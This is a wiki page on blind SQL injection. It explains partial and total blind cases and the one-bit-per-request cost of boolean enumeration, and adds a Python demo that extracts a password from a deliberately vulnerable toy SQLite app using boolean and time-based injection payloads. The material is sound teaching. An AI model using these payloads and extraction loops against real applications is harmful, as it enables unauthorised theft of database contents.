Difference between revisions of "SQL injection/Blind"
Revision as of 01:41, 20 November 2012
There are primarily two types of blind SQL injection vulnerabilities: partial blind and total blind.
Partial blind injection is called partial because the data returned by the application changes to some extent depending on whether the injected condition is true or false. The change may be as small as a piece of content that is displayed in one case and not in the other.
In a total blind (completely blind) vulnerability the response data does not change at all regardless of the request, so timing attacks must be used for exploitation: the injected condition is made to affect the HTTP response time rather than the HTTP response data.
There are traditionally two types of exploitation for blind SQL injection:
- Blind data extraction
- Boolean enumeration
Each exploitation method has options that work for both partial blind and total blind injection. Blind data extraction is by far the faster of the two. With boolean enumeration an attacker receives only one bit of information per request: each request answers a single yes/no question about the target value. Recovering one character of printable text by binary search therefore takes 7 requests (the high-order bit is never set in printable ASCII characters, so the search space is 0 to 127), and up to 8 requests per byte for binary data, where all 256 values are possible. Blind data extraction, in comparison, can retrieve more than a full byte per request.
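The following is an added example, not code from the original page: it runs boolean enumeration against a deliberately vulnerable query in an in-memory SQLite database and shows both oracles described above. For the partial blind case the response content differs (a welcome message versus an error); for the total blind case the content is fixed and only the response time differs. The table, column and password values are constructed sample data, and because SQLite has no SLEEP(), a sleep() user-defined function is registered to stand in for the delay function a real database such as MySQL would provide. The same binary search serves both oracles and yields exactly the request counts the text gives: 7 per character over the printable range and 8 over the full byte range.

```python
"""Boolean enumeration against a blind SQL injection (added example, constructed data)."""
import sqlite3
import time

SECRET = "s3cr3t"   # constructed sample value stored in the table; the attacker does not know it
DELAY = 0.1         # seconds the time-based payload asks the database to sleep


class VulnerableApp:
    """Toy application that concatenates untrusted input into SQL (the bug under discussion)."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
        self.conn.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))
        # SQLite has no SLEEP(); this stand-in UDF plays the role of MySQL's SLEEP().
        self.conn.create_function("sleep", 1, lambda secs: time.sleep(secs) or 0)
        self.requests = 0

    def _query(self, username):
        self.requests += 1
        sql = "SELECT name FROM users WHERE name = '" + username + "'"   # injection point
        return self.conn.execute(sql).fetchone()

    def partial_blind(self, username):
        """Response content depends on the query result: welcome page vs. error page."""
        return "Welcome back" if self._query(username) else "Login failed"

    def total_blind(self, username):
        """Response content is fixed; only the response time can leak anything."""
        self._query(username)
        return "Login failed"


# Yes/no question every payload asks: "is the code point of character `pos` of the admin
# password greater than `mid`?"  ifnull() maps positions past the end of the string to 0,
# which the extractor treats as the terminator.
COND = ("(SELECT ifnull(unicode(substr(password,{pos},1)),0) > {mid} "
        "FROM users WHERE name='admin')")


def partial_blind_oracle(app):
    """Oracle for the partial blind case: the answer is read from the response content."""
    def ask(pos, mid):
        payload = "admin' AND " + COND.format(pos=pos, mid=mid) + "--"
        return app.partial_blind(payload) == "Welcome back"
    return ask


def total_blind_oracle(app):
    """Oracle for the total blind case: the answer is read from the response time."""
    def ask(pos, mid):
        payload = ("admin' AND (SELECT CASE WHEN " + COND.format(pos=pos, mid=mid)
                   + " THEN sleep(" + str(DELAY) + ") ELSE 0 END)--")
        start = time.monotonic()
        app.total_blind(payload)
        # Threshold halfway between the two cases; real networks are noisier than an
        # in-process call, so in practice repeat ambiguous measurements before deciding.
        return time.monotonic() - start > DELAY / 2
    return ask


def extract_char(ask, pos, printable=True):
    """Binary search one character's code point, one bit per request.

    Search space 0..127 for printable text (7 requests), 0..255 for binary (8 requests).
    Returns (character, requests_used).
    """
    lo, hi = (0, 127) if printable else (0, 255)
    requests = 0
    while lo < hi:
        mid = (lo + hi) // 2
        requests += 1
        if ask(pos, mid):      # code point is greater than mid
            lo = mid + 1
        else:
            hi = mid
    return chr(lo), requests


def extract_string(ask, printable=True, max_len=64):
    """Extract characters position by position until the terminator (code point 0) appears."""
    out, total = "", 0
    for pos in range(1, max_len + 1):
        ch, n = extract_char(ask, pos, printable)
        total += n
        if ch == "\0":
            break
        out += ch
    return out, total


if __name__ == "__main__":
    app = VulnerableApp()
    print("partial blind:", extract_string(partial_blind_oracle(app)))
    print("total blind:  ", extract_string(total_blind_oracle(VulnerableApp())))
```

Running it recovers the six-character value plus the terminator in 49 requests over the printable range (7 per position) and 56 over the full byte range (8 per position), which is the one-bit-per-request cost the text describes. The time-based oracle costs the same number of requests but each true answer also costs a DELAY of wall-clock time, which is why total blind exploitation is so much slower in practice.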